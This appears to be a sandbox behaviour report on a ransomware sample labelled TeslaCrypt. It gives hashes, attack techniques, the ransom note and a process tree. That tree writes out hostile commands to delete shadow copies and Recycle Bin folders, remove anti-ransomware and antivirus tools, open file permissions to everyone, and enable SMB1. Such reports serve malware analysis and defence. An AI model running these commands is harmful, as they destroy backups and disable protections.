teslacrypt | 8e775324fc69a677394cf6d079d1d45bf53af10acd683bda53e5f86a8a192393

Analysis

max time kernel
109s
max time network
150s
platform
windows10_x64
resource
win10v20201028
submitted
22-01-2021 08:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

GZTJoxx.exe
Size

88KB
MD5

19f207b20b1d2a05aba1a1eb59da54d2
SHA1

8d75108ec34fd79f8336041d5ff31443cc527add
SHA256

8e775324fc69a677394cf6d079d1d45bf53af10acd683bda53e5f86a8a192393
SHA512

6a6b97e5f4543437270628af70a67e51a32d1ad9afbc0f19611d0131d9e84154f8525e3aeeb41c82f1c4437694be898b7ef520ac8eddf9b227f3d1013e57f749

Score

10^/10

teslacrypt discovery evasion ransomware trojan

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Ransom Note

Don't worry, you can return all your files! All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. We also downloaded your corporate files (databases, tables, accounting information, etc.) and we will have to publish them if you do not agree to cooperation. To get this software you need write on our e-mail: workplus111@protonmail.com Reserve e-mail address to contact us: worker400@airmail.cc Key Identifier: ruIEJYipPBQ0Ge9KOXDjKrypFF0FBvH/RAPJO2HxUwIjOtuklxgya3h2mH8qTZBPW7QoG4GN5cIOFwEGTzWdPwdfAosHeWBy6Oi7/PrWkiWWK1pIcySXcu4t2SeftV2RrCZZ/OjcieCKrXuBP1QIdYyi2dtWqybztRFtl7/V1gpYCpfKn373aDJwJekNizNDb3YEY7NJxBzFOUzR+rtl2tpjpeQSi/raFU/TkcXD+pphFW25Ueg9FOFkd2XQ6D6weA/9KEnHjp4Jy4o1XodXn/Tkxv8E/jGj41Bc4jwbWNQxTHvnYNIjR6NDkMZYCavwThvr01KMES36fbXH6mw26XSXoCAtA0zxPOwMBNuTJ2SHr7jUOG+zB0xSwlypj3rE2vpES6zk6Jazd8xWaw3ZaS+CuSMKL0FxafC9+J4dnCX4X67F4U69w/Qv4a4fv1Mbds8tslxta85qyZmA4v9nBhdrz+0lQc6ghvVenIOj1hYWWobq/js+4mLrjukRJemCnQXfmlkpyNKIvIRBMKMDUKR5ZVc/Vd2ltouV0DIqFySQBLtMcfT7K9TEJnBTptk5bWBAKs1XotD7ZBvqUzR1UiytwyPHeK+SsFf+d4O8XzQpcK8F8HrX1pnLfphXYlOfYG18IPkRYcpD4hazHS0ivqM+V2cRV4eL/UW0h9Vx6eM=

Emails

workplus111@protonmail.com

worker400@airmail.cc

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

Ransom Note

Emails

workplus111@protonmail.com

worker400@airmail.cc

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
TeslaCrypt, AlphaCrypt
Ransomware based on CryptoLocker. Shut down by the developers in 2016.
ransomware teslacrypt
Executes dropped EXE 1 IoCs

Processes:

wqm58yk7.exe

pid process

2492 wqm58yk7.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

wqm58yk7.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\RestoreClose.tiff => C:\Users\Admin\Pictures\RestoreClose.tiff.0l0lqq	wqm58yk7.exe
File opened for modification	C:\Users\Admin\Pictures\RestoreClose.tiff	wqm58yk7.exe

Drops startup file 1 IoCs

Processes:

wqm58yk7.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk wqm58yk7.exe
Modifies file permissions 1 TTPs 3 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

11336 icacls.exe
11476 icacls.exe
7412 icacls.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	wqm58yk7.exe

pid	process
11336	icacls.exe
11476	icacls.exe
7412	icacls.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

wqm58yk7.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	wqm58yk7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	wqm58yk7.exe

Drops file in Windows directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\Logs\DISM\dism.log powershell.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

15240 net.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\DISM\dism.log	powershell.exe

pid	process
15240	net.exe

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
8952	taskkill.exe
8920	taskkill.exe
8856	taskkill.exe
8744	taskkill.exe
9120	taskkill.exe
9032	taskkill.exe
8968	taskkill.exe
8816	taskkill.exe
8688	taskkill.exe
9008	taskkill.exe
8904	taskkill.exe
8832	taskkill.exe
8760	taskkill.exe
8728	taskkill.exe
8712	taskkill.exe
8648	taskkill.exe
8624	taskkill.exe
3312	taskkill.exe
8880	taskkill.exe
8840	taskkill.exe
8984	taskkill.exe
8808	taskkill.exe
8784	taskkill.exe
8768	taskkill.exe
9096	taskkill.exe
9080	taskkill.exe
9040	taskkill.exe
8600	taskkill.exe
8896	taskkill.exe
8720	taskkill.exe
8640	taskkill.exe
6984	taskkill.exe
8872	taskkill.exe
8696	taskkill.exe
8616	taskkill.exe
8396	taskkill.exe
9016	taskkill.exe
8992	taskkill.exe
10808	taskkill.exe
8664	taskkill.exe
9064	taskkill.exe
8928	taskkill.exe
8672	taskkill.exe
8944	taskkill.exe
8792	taskkill.exe
8224	taskkill.exe
9136	taskkill.exe
11160	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1080 reg.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

9656 notepad.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4384 PING.EXE

pid	process
1080	reg.exe

pid	process
9656	notepad.exe

pid	process
4384	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

wqm58yk7.exe

pid	process
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe
2492	wqm58yk7.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

Processes:

wqm58yk7.exepowershell.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2492	wqm58yk7.exe
Token: SeDebugPrivilege	3292	powershell.exe
Token: SeDebugPrivilege	3312	taskkill.exe
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeDebugPrivilege	8616	taskkill.exe
Token: SeDebugPrivilege	8696	taskkill.exe
Token: SeDebugPrivilege	8784	taskkill.exe
Token: SeDebugPrivilege	8744	taskkill.exe
Token: SeDebugPrivilege	8872	taskkill.exe
Token: SeDebugPrivilege	8984	taskkill.exe
Token: SeDebugPrivilege	8968	taskkill.exe
Token: SeDebugPrivilege	8672	taskkill.exe
Token: SeDebugPrivilege	8664	taskkill.exe
Token: SeDebugPrivilege	8952	taskkill.exe
Token: SeDebugPrivilege	8728	taskkill.exe
Token: SeDebugPrivilege	9016	taskkill.exe
Token: SeDebugPrivilege	11160	taskkill.exe
Token: SeDebugPrivilege	8880	taskkill.exe
Token: SeDebugPrivilege	8688	taskkill.exe
Token: SeDebugPrivilege	8224	taskkill.exe
Token: SeDebugPrivilege	8624	taskkill.exe
Token: SeDebugPrivilege	9096	taskkill.exe
Token: SeDebugPrivilege	8896	taskkill.exe
Token: SeDebugPrivilege	8648	taskkill.exe
Token: SeDebugPrivilege	8768	taskkill.exe
Token: SeDebugPrivilege	8712	taskkill.exe
Token: SeDebugPrivilege	8816	taskkill.exe
Token: SeDebugPrivilege	8928	taskkill.exe
Token: SeDebugPrivilege	8396	taskkill.exe
Token: SeDebugPrivilege	8600	taskkill.exe
Token: SeDebugPrivilege	8856	taskkill.exe
Token: SeDebugPrivilege	8920	taskkill.exe
Token: SeDebugPrivilege	8640	taskkill.exe
Token: SeDebugPrivilege	8792	taskkill.exe
Token: SeDebugPrivilege	8992	taskkill.exe
Token: SeDebugPrivilege	10808	taskkill.exe
Token: SeDebugPrivilege	8832	taskkill.exe
Token: SeDebugPrivilege	9120	taskkill.exe
Token: SeDebugPrivilege	8720	taskkill.exe
Token: SeDebugPrivilege	8904	taskkill.exe
Token: SeDebugPrivilege	9064	taskkill.exe
Token: SeDebugPrivilege	9080	taskkill.exe
Token: SeDebugPrivilege	8944	taskkill.exe
Token: SeDebugPrivilege	8760	taskkill.exe
Token: SeDebugPrivilege	9032	taskkill.exe
Token: SeDebugPrivilege	9136	taskkill.exe
Token: SeDebugPrivilege	9008	taskkill.exe
Token: SeDebugPrivilege	6984	taskkill.exe
Token: SeDebugPrivilege	8840	taskkill.exe
Token: SeDebugPrivilege	9040	taskkill.exe
Token: SeDebugPrivilege	6384	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

wqm58yk7.exe

pid process

2492 wqm58yk7.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

wqm58yk7.exe

pid process

2492 wqm58yk7.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

GZTJoxx.exewqm58yk7.exe

description	pid	process	target process
PID 988 wrote to memory of 2492	988	GZTJoxx.exe	wqm58yk7.exe
PID 988 wrote to memory of 2492	988	GZTJoxx.exe	wqm58yk7.exe
PID 988 wrote to memory of 2492	988	GZTJoxx.exe	wqm58yk7.exe
PID 2492 wrote to memory of 3292	2492	wqm58yk7.exe	powershell.exe
PID 2492 wrote to memory of 3292	2492	wqm58yk7.exe	powershell.exe
PID 2492 wrote to memory of 3292	2492	wqm58yk7.exe	powershell.exe
PID 2492 wrote to memory of 3312	2492	wqm58yk7.exe	taskkill.exe
PID 2492 wrote to memory of 3312	2492	wqm58yk7.exe	taskkill.exe
PID 2492 wrote to memory of 3312	2492	wqm58yk7.exe	taskkill.exe
PID 2492 wrote to memory of 2496	2492	wqm58yk7.exe	reg.exe
PID 2492 wrote to memory of 2496	2492	wqm58yk7.exe	reg.exe
PID 2492 wrote to memory of 2496	2492	wqm58yk7.exe	reg.exe
PID 2492 wrote to memory of 1080	2492	wqm58yk7.exe	reg.exe
PID 2492 wrote to memory of 1080	2492	wqm58yk7.exe	reg.exe
PID 2492 wrote to memory of 1080	2492	wqm58yk7.exe	reg.exe
PID 2492 wrote to memory of 3884	2492	wqm58yk7.exe	schtasks.exe
PID 2492 wrote to memory of 3884	2492	wqm58yk7.exe	schtasks.exe
PID 2492 wrote to memory of 3884	2492	wqm58yk7.exe	schtasks.exe
PID 2492 wrote to memory of 1392	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 1392	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 1392	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 2992	2492	wqm58yk7.exe	cmd.exe
PID 2492 wrote to memory of 2992	2492	wqm58yk7.exe	cmd.exe
PID 2492 wrote to memory of 2992	2492	wqm58yk7.exe	cmd.exe
PID 2492 wrote to memory of 3040	2492	wqm58yk7.exe	cmd.exe
PID 2492 wrote to memory of 3040	2492	wqm58yk7.exe	cmd.exe
PID 2492 wrote to memory of 3040	2492	wqm58yk7.exe	cmd.exe
PID 2492 wrote to memory of 3968	2492	wqm58yk7.exe	netsh.exe
PID 2492 wrote to memory of 3968	2492	wqm58yk7.exe	netsh.exe
PID 2492 wrote to memory of 3968	2492	wqm58yk7.exe	netsh.exe
PID 2492 wrote to memory of 3288	2492	wqm58yk7.exe	netsh.exe
PID 2492 wrote to memory of 3288	2492	wqm58yk7.exe	netsh.exe
PID 2492 wrote to memory of 3288	2492	wqm58yk7.exe	netsh.exe
PID 2492 wrote to memory of 3044	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 3044	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 3044	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 3960	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 3960	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 3960	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 2100	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 2100	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 2100	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 1880	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 1880	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 1880	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 2112	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 2112	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 2112	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 4124	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 4124	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 4124	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 4160	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 4160	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 4160	2492	wqm58yk7.exe	sc.exe
PID 2492 wrote to memory of 4240	2492	wqm58yk7.exe	net.exe
PID 2492 wrote to memory of 4240	2492	wqm58yk7.exe	net.exe
PID 2492 wrote to memory of 4240	2492	wqm58yk7.exe	net.exe
PID 2492 wrote to memory of 4264	2492	wqm58yk7.exe	net.exe
PID 2492 wrote to memory of 4264	2492	wqm58yk7.exe	net.exe
PID 2492 wrote to memory of 4264	2492	wqm58yk7.exe	net.exe
PID 2492 wrote to memory of 4296	2492	wqm58yk7.exe	net.exe
PID 2492 wrote to memory of 4296	2492	wqm58yk7.exe	net.exe
PID 2492 wrote to memory of 4296	2492	wqm58yk7.exe	net.exe
PID 2492 wrote to memory of 4328	2492	wqm58yk7.exe	net.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

wqm58yk7.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	wqm58yk7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	wqm58yk7.exe

C:\Users\Admin\AppData\Local\Temp\GZTJoxx.exe
"C:\Users\Admin\AppData\Local\Temp\GZTJoxx.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:988

C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe
"C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe"
2⤵
- Executes dropped EXE
- Modifies extensions of user files
- Drops startup file
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2492

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3292

C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3312

C:\Windows\SysWOW64\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
3⤵
PID:2496

C:\Windows\SysWOW64\reg.exe
"reg" delete HKCU\Software\Raccine /F
3⤵
- Modifies registry key
PID:1080

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
3⤵
PID:3884

C:\Windows\SysWOW64\sc.exe
"sc.exe" config Dnscache start= auto
3⤵
PID:1392

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
3⤵
PID:2992

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q D:\\$Recycle.bin
3⤵
PID:3040

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
3⤵
PID:3968

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
3⤵
PID:3044

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
3⤵
PID:3960

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
3⤵
PID:2100

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SSDPSRV start= auto
3⤵
PID:1880

C:\Windows\SysWOW64\net.exe
"net.exe" start Dnscache /y
3⤵
PID:4240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Dnscache /y
4⤵
PID:4648

C:\Windows\SysWOW64\net.exe
"net.exe" start SSDPSRV /y
3⤵
PID:4264

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start SSDPSRV /y
4⤵
PID:4772

C:\Windows\SysWOW64\net.exe
"net.exe" start upnphost /y
3⤵
PID:4296

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start upnphost /y
4⤵
PID:4704

C:\Windows\SysWOW64\net.exe
"net.exe" stop avpsus /y
3⤵
PID:4328

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop avpsus /y
4⤵
PID:4764

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeDLPAgentService /y
3⤵
PID:4376

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
4⤵
PID:4860

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfewc /y
3⤵
PID:4424

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
4⤵
PID:4936

C:\Windows\SysWOW64\sc.exe
"sc.exe" config upnphost start= auto
3⤵
PID:4160

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
3⤵
PID:4124

C:\Windows\SysWOW64\sc.exe
"sc.exe" config FDResPub start= auto
3⤵
PID:2112

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
3⤵
PID:3288

C:\Windows\SysWOW64\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
3⤵
PID:4492

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
4⤵
PID:4988

C:\Windows\SysWOW64\net.exe
"net.exe" stop bedbg /y
3⤵
PID:4552

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop bedbg /y
4⤵
PID:5100

C:\Windows\SysWOW64\net.exe
"net.exe" start FDResPub /y
3⤵
PID:4588

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start FDResPub /y
4⤵
PID:5112

C:\Windows\SysWOW64\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
3⤵
PID:4628

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
4⤵
PID:2876

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
3⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4884

C:\Windows\SysWOW64\net.exe
"net.exe" stop ccEvtMgr /y
3⤵
PID:5000

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
4⤵
PID:4636

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQL_2008 /y
3⤵
PID:5048

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
4⤵
PID:2588

C:\Windows\SysWOW64\net.exe
"net.exe" stop EhttpSrv /y
3⤵
PID:2116

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
4⤵
PID:3140

C:\Windows\SysWOW64\net.exe
"net.exe" stop MMS /y
3⤵
PID:4132

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MMS /y
4⤵
PID:5032

C:\Windows\SysWOW64\net.exe
"net.exe" stop stc_raw_agent /y
3⤵
PID:4212

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
4⤵
PID:11168

C:\Windows\SysWOW64\net.exe
"net.exe" stop zhudongfangyu /y
3⤵
PID:4120

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
4⤵
PID:8380

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQLEXPRESS /y
3⤵
PID:4260

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
4⤵
PID:2824

C:\Windows\SysWOW64\net.exe
"net.exe" stop ccSetMgr /y
3⤵
PID:1436

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
4⤵
PID:11484

C:\Windows\SysWOW64\net.exe
"net.exe" stop SavRoam /y
3⤵
PID:4944

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
4⤵
PID:11964

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMTA /y
3⤵
PID:5340

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
4⤵
PID:13108

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8224

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9136

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9120

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9096

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9080

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9064

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9040

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9032

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9016

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9008

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM winword.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8992

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8984

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM visio.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8968

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8952

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10808

C:\Windows\SysWOW64\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:7412

C:\Windows\SysWOW64\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:11336

C:\Windows\SysWOW64\arp.exe
"arp" -a
3⤵
PID:16312

C:\Windows\SysWOW64\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:11476

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6384

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11160

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6984

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8944

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8928

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8920

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
